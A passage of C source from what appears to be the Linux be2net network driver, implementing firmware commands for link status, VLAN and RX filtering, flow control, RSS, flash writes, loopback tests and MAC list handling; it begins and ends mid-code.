spin_unlock_bh(&adapter->mcc_lock); return status; } /* Lancer Stats */ int lancer_cmd_get_pport_stats(struct be_adapter *adapter, struct be_dma_mem *nonemb_cmd) { struct be_mcc_wrb *wrb; struct lancer_cmd_req_pport_stats *req; int status = 0; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = nonemb_cmd->va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_GET_PPORT_STATS, nonemb_cmd->size, wrb, nonemb_cmd); req->cmd_params.params.pport_num = cpu_to_le16(adapter->port_num); req->cmd_params.params.reset_stats = 0; be_mcc_notify(adapter); adapter->stats_cmd_sent = true; err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses synchronous mcc */ int be_cmd_link_status_query(struct be_adapter *adapter, u8 *mac_speed, u16 *link_speed, u8 *link_status, u32 dom) { struct be_mcc_wrb *wrb; struct be_cmd_req_link_status *req; int status; spin_lock_bh(&adapter->mcc_lock); if (link_status) *link_status = LINK_DOWN; wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_LINK_STATUS_QUERY, sizeof(*req), wrb, NULL); if (adapter->generation == BE_GEN3 || lancer_chip(adapter)) req->hdr.version = 1; req->hdr.domain = dom; status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_link_status *resp = embedded_payload(wrb); if (resp->mac_speed != PHY_LINK_SPEED_ZERO) { if (link_speed) *link_speed = le16_to_cpu(resp->link_speed); if (mac_speed) *mac_speed = resp->mac_speed; } if (link_status) *link_status = resp->logical_link_status; } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses synchronous mcc */ int be_cmd_get_die_temperature(struct be_adapter *adapter) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_cntl_addnl_attribs *req; u16 mccq_index; int status; spin_lock_bh(&adapter->mcc_lock); mccq_index = adapter->mcc_obj.q.head; wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_CNTL_ADDITIONAL_ATTRIBUTES, sizeof(*req), wrb, NULL); wrb->tag1 = mccq_index; be_mcc_notify(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses synchronous mcc */ int be_cmd_get_reg_len(struct be_adapter *adapter, u32 *log_size) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_fat *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_MANAGE_FAT, sizeof(*req), wrb, NULL); req->fat_operation = cpu_to_le32(QUERY_FAT); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_fat *resp = embedded_payload(wrb); if (log_size && resp->log_size) *log_size = le32_to_cpu(resp->log_size) - sizeof(u32); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } void be_cmd_get_regs(struct be_adapter *adapter, u32 buf_len, void *buf) { struct be_dma_mem get_fat_cmd; struct be_mcc_wrb *wrb; struct be_cmd_req_get_fat *req; u32 offset = 0, total_size, buf_size, log_offset = sizeof(u32), payload_len; int status; if (buf_len == 0) return; total_size = buf_len; get_fat_cmd.size = sizeof(struct be_cmd_req_get_fat) + 60*1024; get_fat_cmd.va = pci_alloc_consistent(adapter->pdev, get_fat_cmd.size, &get_fat_cmd.dma); if (!get_fat_cmd.va) { status = -ENOMEM; dev_err(&adapter->pdev->dev, "Memory allocation failure while retrieving FAT data\n"); return; } spin_lock_bh(&adapter->mcc_lock); while (total_size) { buf_size = min(total_size, (u32)60*1024); total_size -= buf_size; wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = get_fat_cmd.va; payload_len = sizeof(struct be_cmd_req_get_fat) + buf_size; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_MANAGE_FAT, payload_len, wrb, &get_fat_cmd); req->fat_operation = cpu_to_le32(RETRIEVE_FAT); req->read_log_offset = cpu_to_le32(log_offset); req->read_log_length = cpu_to_le32(buf_size); req->data_buffer_size = cpu_to_le32(buf_size); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_fat *resp = get_fat_cmd.va; memcpy(buf + offset, resp->data_buffer, le32_to_cpu(resp->read_log_length)); } else { dev_err(&adapter->pdev->dev, "FAT Table Retrieve error\n"); goto err; } offset += buf_size; log_offset += buf_size; } err: pci_free_consistent(adapter->pdev, get_fat_cmd.size, get_fat_cmd.va, get_fat_cmd.dma); spin_unlock_bh(&adapter->mcc_lock); } /* Uses synchronous mcc */ int be_cmd_get_fw_ver(struct be_adapter *adapter, char *fw_ver, char *fw_on_flash) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_fw_version *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_FW_VERSION, sizeof(*req), wrb, NULL); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_fw_version *resp = embedded_payload(wrb); strcpy(fw_ver, resp->firmware_version_string); if (fw_on_flash) strcpy(fw_on_flash, resp->fw_on_flash_version_string); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* set the EQ delay interval of an EQ to specified value * Uses async mcc */ int be_cmd_modify_eqd(struct be_adapter *adapter, u32 eq_id, u32 eqd) { struct be_mcc_wrb *wrb; struct be_cmd_req_modify_eq_delay *req; int status = 0; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_MODIFY_EQ_DELAY, sizeof(*req), wrb, NULL); req->num_eq = cpu_to_le32(1); req->delay[0].eq_id = cpu_to_le32(eq_id); req->delay[0].phase = 0; req->delay[0].delay_multiplier = cpu_to_le32(eqd); be_mcc_notify(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses sycnhronous mcc */ int be_cmd_vlan_config(struct be_adapter *adapter, u32 if_id, u16 *vtag_array, u32 num, bool untagged, bool promiscuous) { struct be_mcc_wrb *wrb; struct be_cmd_req_vlan_config *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_VLAN_CONFIG, sizeof(*req), wrb, NULL); req->interface_id = if_id; req->promiscuous = promiscuous; req->untagged = untagged; req->num_vlan = num; if (!promiscuous) { memcpy(req->normal_vlan, vtag_array, req->num_vlan * sizeof(vtag_array[0])); } status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_rx_filter(struct be_adapter *adapter, u32 flags, u32 value) { struct be_mcc_wrb *wrb; struct be_dma_mem *mem = &adapter->rx_filter; struct be_cmd_req_rx_filter *req = mem->va; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } memset(req, 0, sizeof(*req)); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_RX_FILTER, sizeof(*req), wrb, mem); req->if_id = cpu_to_le32(adapter->if_handle); if (flags & IFF_PROMISC) { req->if_flags_mask = cpu_to_le32(BE_IF_FLAGS_PROMISCUOUS | BE_IF_FLAGS_VLAN_PROMISCUOUS); if (value == ON) req->if_flags = cpu_to_le32(BE_IF_FLAGS_PROMISCUOUS | BE_IF_FLAGS_VLAN_PROMISCUOUS); } else if (flags & IFF_ALLMULTI) { req->if_flags_mask = req->if_flags = cpu_to_le32(BE_IF_FLAGS_MCAST_PROMISCUOUS); } else { struct netdev_hw_addr *ha; int i = 0; req->if_flags_mask = req->if_flags = cpu_to_le32(BE_IF_FLAGS_MULTICAST); /* Reset mcast promisc mode if already set by setting mask * and not setting flags field */ req->if_flags_mask |= cpu_to_le32(BE_IF_FLAGS_MCAST_PROMISCUOUS); req->mcast_num = cpu_to_le32(netdev_mc_count(adapter->netdev)); netdev_for_each_mc_addr(ha, adapter->netdev) memcpy(req->mcast_mac[i++].byte, ha->addr, ETH_ALEN); } status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses synchrounous mcc */ int be_cmd_set_flow_control(struct be_adapter *adapter, u32 tx_fc, u32 rx_fc) { struct be_mcc_wrb *wrb; struct be_cmd_req_set_flow_control *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_SET_FLOW_CONTROL, sizeof(*req), wrb, NULL); req->tx_flow_control = cpu_to_le16((u16)tx_fc); req->rx_flow_control = cpu_to_le16((u16)rx_fc); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses sycn mcc */ int be_cmd_get_flow_control(struct be_adapter *adapter, u32 *tx_fc, u32 *rx_fc) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_flow_control *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_FLOW_CONTROL, sizeof(*req), wrb, NULL); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_flow_control *resp = embedded_payload(wrb); *tx_fc = le16_to_cpu(resp->tx_flow_control); *rx_fc = le16_to_cpu(resp->rx_flow_control); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses mbox */ int be_cmd_query_fw_cfg(struct be_adapter *adapter, u32 *port_num, u32 *mode, u32 *caps) { struct be_mcc_wrb *wrb; struct be_cmd_req_query_fw_cfg *req; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_QUERY_FIRMWARE_CONFIG, sizeof(*req), wrb, NULL); status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_query_fw_cfg *resp = embedded_payload(wrb); *port_num = le32_to_cpu(resp->phys_port); *mode = le32_to_cpu(resp->function_mode); *caps = le32_to_cpu(resp->function_caps); } mutex_unlock(&adapter->mbox_lock); return status; } /* Uses mbox */ int be_cmd_reset_function(struct be_adapter *adapter) { struct be_mcc_wrb *wrb; struct be_cmd_req_hdr *req; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(req, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_FUNCTION_RESET, sizeof(*req), wrb, NULL); status = be_mbox_notify_wait(adapter); mutex_unlock(&adapter->mbox_lock); return status; } int be_cmd_rss_config(struct be_adapter *adapter, u8 *rsstable, u16 table_size) { struct be_mcc_wrb *wrb; struct be_cmd_req_rss_config *req; u32 myhash[10] = {0x15d43fa5, 0x2534685a, 0x5f87693a, 0x5668494e, 0x33cf6a53, 0x383334c6, 0x76ac4257, 0x59b242b2, 0x3ea83c02, 0x4a110304}; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_RSS_CONFIG, sizeof(*req), wrb, NULL); req->if_id = cpu_to_le32(adapter->if_handle); req->enable_rss = cpu_to_le16(RSS_ENABLE_TCP_IPV4 | RSS_ENABLE_IPV4 | RSS_ENABLE_TCP_IPV6 | RSS_ENABLE_IPV6); req->cpu_table_size_log2 = cpu_to_le16(fls(table_size) - 1); memcpy(req->cpu_table, rsstable, table_size); memcpy(req->hash, myhash, sizeof(myhash)); be_dws_cpu_to_le(req->hash, sizeof(req->hash)); status = be_mbox_notify_wait(adapter); mutex_unlock(&adapter->mbox_lock); return status; } /* Uses sync mcc */ int be_cmd_set_beacon_state(struct be_adapter *adapter, u8 port_num, u8 bcn, u8 sts, u8 state) { struct be_mcc_wrb *wrb; struct be_cmd_req_enable_disable_beacon *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_ENABLE_DISABLE_BEACON, sizeof(*req), wrb, NULL); req->port_num = port_num; req->beacon_state = state; req->beacon_duration = bcn; req->status_duration = sts; status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses sync mcc */ int be_cmd_get_beacon_state(struct be_adapter *adapter, u8 port_num, u32 *state) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_beacon_state *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_BEACON_STATE, sizeof(*req), wrb, NULL); req->port_num = port_num; status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_beacon_state *resp = embedded_payload(wrb); *state = resp->beacon_state; } err: spin_unlock_bh(&adapter->mcc_lock); return status; } int lancer_cmd_write_object(struct be_adapter *adapter, struct be_dma_mem *cmd, u32 data_size, u32 data_offset, const char *obj_name, u32 *data_written, u8 *addn_status) { struct be_mcc_wrb *wrb; struct lancer_cmd_req_write_object *req; struct lancer_cmd_resp_write_object *resp; void *ctxt = NULL; int status; spin_lock_bh(&adapter->mcc_lock); adapter->flash_status = 0; wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err_unlock; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_WRITE_OBJECT, sizeof(struct lancer_cmd_req_write_object), wrb, NULL); ctxt = &req->context; AMAP_SET_BITS(struct amap_lancer_write_obj_context, write_length, ctxt, data_size); if (data_size == 0) AMAP_SET_BITS(struct amap_lancer_write_obj_context, eof, ctxt, 1); else AMAP_SET_BITS(struct amap_lancer_write_obj_context, eof, ctxt, 0); be_dws_cpu_to_le(ctxt, sizeof(req->context)); req->write_offset = cpu_to_le32(data_offset); strcpy(req->object_name, obj_name); req->descriptor_count = cpu_to_le32(1); req->buf_len = cpu_to_le32(data_size); req->addr_low = cpu_to_le32((cmd->dma + sizeof(struct lancer_cmd_req_write_object)) & 0xFFFFFFFF); req->addr_high = cpu_to_le32(upper_32_bits(cmd->dma + sizeof(struct lancer_cmd_req_write_object))); be_mcc_notify(adapter); spin_unlock_bh(&adapter->mcc_lock); if (!wait_for_completion_timeout(&adapter->flash_compl, msecs_to_jiffies(12000))) status = -1; else status = adapter->flash_status; resp = embedded_payload(wrb); if (!status) { *data_written = le32_to_cpu(resp->actual_write_len); } else { *addn_status = resp->additional_status; status = resp->status; } return status; err_unlock: spin_unlock_bh(&adapter->mcc_lock); return status; } int lancer_cmd_read_object(struct be_adapter *adapter, struct be_dma_mem *cmd, u32 data_size, u32 data_offset, const char *obj_name, u32 *data_read, u32 *eof, u8 *addn_status) { struct be_mcc_wrb *wrb; struct lancer_cmd_req_read_object *req; struct lancer_cmd_resp_read_object *resp; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err_unlock; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_READ_OBJECT, sizeof(struct lancer_cmd_req_read_object), wrb, NULL); req->desired_read_len = cpu_to_le32(data_size); req->read_offset = cpu_to_le32(data_offset); strcpy(req->object_name, obj_name); req->descriptor_count = cpu_to_le32(1); req->buf_len = cpu_to_le32(data_size); req->addr_low = cpu_to_le32((cmd->dma & 0xFFFFFFFF)); req->addr_high = cpu_to_le32(upper_32_bits(cmd->dma)); status = be_mcc_notify_wait(adapter); resp = embedded_payload(wrb); if (!status) { *data_read = le32_to_cpu(resp->actual_read_len); *eof = le32_to_cpu(resp->eof); } else { *addn_status = resp->additional_status; } err_unlock: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_write_flashrom(struct be_adapter *adapter, struct be_dma_mem *cmd, u32 flash_type, u32 flash_opcode, u32 buf_size) { struct be_mcc_wrb *wrb; struct be_cmd_write_flashrom *req; int status; spin_lock_bh(&adapter->mcc_lock); adapter->flash_status = 0; wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err_unlock; } req = cmd->va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_WRITE_FLASHROM, cmd->size, wrb, cmd); req->params.op_type = cpu_to_le32(flash_type); req->params.op_code = cpu_to_le32(flash_opcode); req->params.data_buf_size = cpu_to_le32(buf_size); be_mcc_notify(adapter); spin_unlock_bh(&adapter->mcc_lock); if (!wait_for_completion_timeout(&adapter->flash_compl, msecs_to_jiffies(40000))) status = -1; else status = adapter->flash_status; return status; err_unlock: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_get_flash_crc(struct be_adapter *adapter, u8 *flashed_crc, int offset) { struct be_mcc_wrb *wrb; struct be_cmd_write_flashrom *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_READ_FLASHROM, sizeof(*req)+4, wrb, NULL); req->params.op_type = cpu_to_le32(IMG_TYPE_REDBOOT); req->params.op_code = cpu_to_le32(FLASHROM_OPER_REPORT); req->params.offset = cpu_to_le32(offset); req->params.data_buf_size = cpu_to_le32(0x4); status = be_mcc_notify_wait(adapter); if (!status) memcpy(flashed_crc, req->params.data_buf, 4); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_enable_magic_wol(struct be_adapter *adapter, u8 *mac, struct be_dma_mem *nonemb_cmd) { struct be_mcc_wrb *wrb; struct be_cmd_req_acpi_wol_magic_config *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = nonemb_cmd->va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_ACPI_WOL_MAGIC_CONFIG, sizeof(*req), wrb, nonemb_cmd); memcpy(req->magic_mac, mac, ETH_ALEN); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_set_loopback(struct be_adapter *adapter, u8 port_num, u8 loopback_type, u8 enable) { struct be_mcc_wrb *wrb; struct be_cmd_req_set_lmode *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_LOWLEVEL, OPCODE_LOWLEVEL_SET_LOOPBACK_MODE, sizeof(*req), wrb, NULL); req->src_port = port_num; req->dest_port = port_num; req->loopback_type = loopback_type; req->loopback_state = enable; status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_loopback_test(struct be_adapter *adapter, u32 port_num, u32 loopback_type, u32 pkt_size, u32 num_pkts, u64 pattern) { struct be_mcc_wrb *wrb; struct be_cmd_req_loopback_test *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_LOWLEVEL, OPCODE_LOWLEVEL_LOOPBACK_TEST, sizeof(*req), wrb, NULL); req->hdr.timeout = cpu_to_le32(4); req->pattern = cpu_to_le64(pattern); req->src_port = cpu_to_le32(port_num); req->dest_port = cpu_to_le32(port_num); req->pkt_size = cpu_to_le32(pkt_size); req->num_pkts = cpu_to_le32(num_pkts); req->loopback_type = cpu_to_le32(loopback_type); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_loopback_test *resp = embedded_payload(wrb); status = le32_to_cpu(resp->status); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_ddr_dma_test(struct be_adapter *adapter, u64 pattern, u32 byte_cnt, struct be_dma_mem *cmd) { struct be_mcc_wrb *wrb; struct be_cmd_req_ddrdma_test *req; int status; int i, j = 0; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = cmd->va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_LOWLEVEL, OPCODE_LOWLEVEL_HOST_DDR_DMA, cmd->size, wrb, cmd); req->pattern = cpu_to_le64(pattern); req->byte_count = cpu_to_le32(byte_cnt); for (i = 0; i < byte_cnt; i++) { req->snd_buff[i] = (u8)(pattern >> (j*8)); j++; if (j > 7) j = 0; } status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_ddrdma_test *resp; resp = cmd->va; if ((memcmp(resp->rcv_buff, req->snd_buff, byte_cnt) != 0) || resp->snd_err) { status = -1; } } err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_get_seeprom_data(struct be_adapter *adapter, struct be_dma_mem *nonemb_cmd) { struct be_mcc_wrb *wrb; struct be_cmd_req_seeprom_read *req; struct be_sge *sge; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = nonemb_cmd->va; sge = nonembedded_sgl(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_SEEPROM_READ, sizeof(*req), wrb, nonemb_cmd); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_get_phy_info(struct be_adapter *adapter, struct be_phy_info *phy_info) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_phy_info *req; struct be_dma_mem cmd; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } cmd.size = sizeof(struct be_cmd_req_get_phy_info); cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory alloc failure\n"); status = -ENOMEM; goto err; } req = cmd.va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_PHY_DETAILS, sizeof(*req), wrb, &cmd); status = be_mcc_notify_wait(adapter); if (!status) { struct be_phy_info *resp_phy_info = cmd.va + sizeof(struct be_cmd_req_hdr); phy_info->phy_type = le16_to_cpu(resp_phy_info->phy_type); phy_info->interface_type = le16_to_cpu(resp_phy_info->interface_type); } pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_set_qos(struct be_adapter *adapter, u32 bps, u32 domain) { struct be_mcc_wrb *wrb; struct be_cmd_req_set_qos *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_SET_QOS, sizeof(*req), wrb, NULL); req->hdr.domain = domain; req->valid_bits = cpu_to_le32(BE_QOS_BITS_NIC); req->max_bps_nic = cpu_to_le32(bps); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_get_cntl_attributes(struct be_adapter *adapter) { struct be_mcc_wrb *wrb; struct be_cmd_req_cntl_attribs *req; struct be_cmd_resp_cntl_attribs *resp; int status; int payload_len = max(sizeof(*req), sizeof(*resp)); struct mgmt_controller_attrib *attribs; struct be_dma_mem attribs_cmd; memset(&attribs_cmd, 0, sizeof(struct be_dma_mem)); attribs_cmd.size = sizeof(struct be_cmd_resp_cntl_attribs); attribs_cmd.va = pci_alloc_consistent(adapter->pdev, attribs_cmd.size, &attribs_cmd.dma); if (!attribs_cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failure\n"); return -ENOMEM; } if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); if (!wrb) { status = -EBUSY; goto err; } req = attribs_cmd.va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_CNTL_ATTRIBUTES, payload_len, wrb, &attribs_cmd); status = be_mbox_notify_wait(adapter); if (!status) { attribs = attribs_cmd.va + sizeof(struct be_cmd_resp_hdr); adapter->hba_port_num = attribs->hba_attribs.phy_port; } err: mutex_unlock(&adapter->mbox_lock); pci_free_consistent(adapter->pdev, attribs_cmd.size, attribs_cmd.va, attribs_cmd.dma); return status; } /* Uses mbox */ int be_cmd_req_native_mode(struct be_adapter *adapter) { struct be_mcc_wrb *wrb; struct be_cmd_req_set_func_cap *req; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_SET_DRIVER_FUNCTION_CAP, sizeof(*req), wrb, NULL); req->valid_cap_flags = cpu_to_le32(CAPABILITY_SW_TIMESTAMPS | CAPABILITY_BE3_NATIVE_ERX_API); req->cap_flags = cpu_to_le32(CAPABILITY_BE3_NATIVE_ERX_API); status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_set_func_cap *resp = embedded_payload(wrb); adapter->be3_native = le32_to_cpu(resp->cap_flags) & CAPABILITY_BE3_NATIVE_ERX_API; } err: mutex_unlock(&adapter->mbox_lock); return status; } /* Uses synchronous MCCQ */ int be_cmd_get_mac_from_list(struct be_adapter *adapter, u32 domain, bool *pmac_id_active, u32 *pmac_id, u8 *mac) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_mac_list *req; int status; int mac_count; struct be_dma_mem get_mac_list_cmd; int i; memset(&get_mac_list_cmd, 0, sizeof(struct be_dma_mem)); get_mac_list_cmd.size = sizeof(struct be_cmd_resp_get_mac_list); get_mac_list_cmd.va = pci_alloc_consistent(adapter->pdev, get_mac_list_cmd.size, &get_mac_list_cmd.dma); if (!get_mac_list_cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failure during GET_MAC_LIST\n"); return -ENOMEM; } spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto out; } req = get_mac_list_cmd.va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_MAC_LIST, sizeof(*req), wrb, &get_mac_list_cmd); req->hdr.domain = domain; req->mac_type = MAC_ADDRESS_TYPE_NETWORK; req->perm_override = 1; status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_mac_list *resp = get_mac_list_cmd.va; mac_count = resp->true_mac_count + resp->pseudo_mac_count; /* Mac list returned could contain one or more active mac_ids * or one or more pseudo permanant mac addresses. If an active * mac_id is present, return first active mac_id found */ for (i = 0; i < mac_count; i++) { struct get_list_macaddr *mac_entry; u16 mac_addr_size; u32 mac_id; mac_entry = &resp->macaddr_list[i]; mac_addr_size = le16_to_cpu(mac_entry->mac_addr_size); /* mac_id is a 32 bit value and mac_addr size * is 6 bytes */ if (mac_addr_size == sizeof(u32)) { *pmac_id_active = true; mac_id = mac_entry->mac_addr_id.s_mac_id.mac_id; *pmac_id = le32_to_cpu(mac_id); goto out; } } /* If no active mac_id found, return first pseudo mac addr */ *pmac_id_active = false; memcpy(mac, resp->macaddr_list[0].mac_addr_id.macaddr, ETH_ALEN); } out: spin_unlock_bh(&adapter->mcc_lock); pci_free_consistent(adapter->pdev, get_mac_list_cmd.size, get_mac_list_cmd.va, get_mac_list_cmd.dma); return status; } /* Uses synchronous MCCQ */ int be_cmd_set_mac_list(struct be_adapter *adapter, u8 *mac_array, u8 mac_count, u32 domain) { struct be_mcc_wrb *wrb; struct be_cmd_req_set_mac_list *req; int status; struct be_dma_mem cmd; memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_req_set_mac_list); cmd.va = 